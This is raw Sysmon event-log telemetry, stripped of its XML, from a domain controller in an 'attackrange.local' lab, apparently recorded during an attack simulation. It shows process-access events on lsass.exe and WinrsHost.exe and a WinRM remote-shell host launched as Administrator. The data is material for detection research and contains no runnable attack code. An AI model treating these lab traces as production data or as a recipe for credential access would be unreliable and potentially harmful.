10:40:47.077{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.077{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.077{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.077{733EE690-3DF9-5F80-1500-000000007F01}13561984C:\Windows\system32\svchost.exe{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.077{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.061{733EE690-3E2F-5F80-7B00-000000007F01}47924812C:\Windows\system32\conhost.exe{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.061{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E2F-5F80-7B00-000000007F01}4792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.061{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.061{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.060{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3E2F-5F80-73C7-040000000000}0x4c7730HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.046{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.030{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.030{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.030{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 